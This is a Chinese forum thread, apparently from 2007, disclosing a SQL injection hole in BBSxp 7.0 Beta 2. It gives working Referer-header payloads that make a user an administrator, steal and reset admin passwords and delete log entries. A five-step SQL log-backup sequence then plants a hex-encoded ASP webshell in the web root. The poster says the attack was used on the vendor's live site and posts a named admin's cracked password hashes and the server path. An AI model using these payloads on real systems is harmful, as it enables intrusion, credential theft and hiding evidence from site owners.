技术论坛 › windows技术 › 再暴BBSxp 7.0 Beta 2漏洞

dirtysea 发表于 2007-1-27 23:02:27

再暴BBSxp 7.0 Beta 2漏洞

<P>漏洞存在于文件setup.asp中</P>
<P>第一部份</P>
<P>注册－&gt;登陆-&gt;发帖-&gt;编辑-&gt;抓包-&gt;改包-&gt;提升为管理员-&gt;更改后台密码-&gt;登陆后台-&gt;WEBSHELL</P>
<P>这里我设密码为：ttfct1 ,NC提交，成功提为管理员。用密码：ttfct1登陆后台。成功获取WEBSHELL，成功备份，获取WEBSHELL　成功。</P>
<P>WEBSHELL获取的两种方法<BR>一：后台上传增加 htr<BR>二：log备份，共4步</P>
<P>第二部份</P>
<P>检测官方网站<BR>我已注册好了，用户是sina147<BR>注册－&gt;登陆-&gt;发帖-&gt;编辑-&gt;抓包<BR>为了不引起管理员注意，我们直接获取管理员密码和后台密码，然后登陆后台。</P>
<P>不好意思，刚才出了点问题，停电了。继续，抓包，修改，我查了一下，yuzi就是管理员了。</P>
<P>yuzi的密码5D4D89BEA718BEE10686FB053E86F13B-&gt;080532779<BR>后台登陆密码：531BC3E862F67DC2BAA871EABDE81A4F-&gt;080532449</P>
<P>登陆后台<BR>本文件请求的物理路径 D:\www\bbs.yuzi.net\Admin_other.asp 有了这个，就有机会拿WEBSHELL了<BR>后面的动画就不作了，大家发挥吧。</P>
<P>OVER<BR>************************************************************************************<BR>提升为管理员:<BR>Referer: http://127.0.0.1','','','修改帖子成功');update bbsxp_users set UserRoleID=1 where username='sina'--</P>
<P><BR>获取管理员密码(即一次密码）：<BR>Referer: http://127.0.0.1','','','修改帖子成功');update bbsxp_users set UserMail=(select userpass from bbsxp_users where username='yuzi') where username='sina147'</P>
<P>获取后台密码(即二次密码）：<BR>Referer: http://127.0.0.1','','','修改帖子成功');update bbsxp_users set UserMail=(select top 1 adminpassword from bbsxp_sitesettings) where username='sina147'</P>
<P>更改后台管理密码(二次密码）<BR>Referer: http://127.0.0.1','','','修改帖子成功');update bbsxp_sitesettings set adminpassword=(select userpass from bbsxp_users where username='sina')</P>
<P>&nbsp;</P>
<P>删除日志：<BR>Referer: http://127.0.0.1','','','修改帖子成功');delete from bbsxp_log where username='sina147'</P>
<P>LOG备份<BR>备份地址：C:\Inetpub\wwwroot\ttfct.asp</P>
<P>第一步<BR>create table . ( )</P>
<P>第二步<BR>declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x7900690061006F006C007500 backup log @a to disk = @s with init,no_truncate</P>
<P>第三步<BR>insert into (cmd) values(0x3C25657865637574652872657175657374282261222929253E)</P>
<P>第四步<BR>declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x43003A005C0049006E00650074007000750062005C0077007700770072006F006F0074005C00740074006600630074002E00610073007000 backup log @a to disk=@s with init,no_truncate</P>
<P>第五步<BR>Drop table <BR></P>

〓陈三太子〓 发表于 2006-5-18 07:49:06

re:再暴BBSxp 7.0 Beta 2漏洞

啊&nbsp; 怎么不发到站里来啊&nbsp;

查看完整版本: 再暴BBSxp 7.0 Beta 2漏洞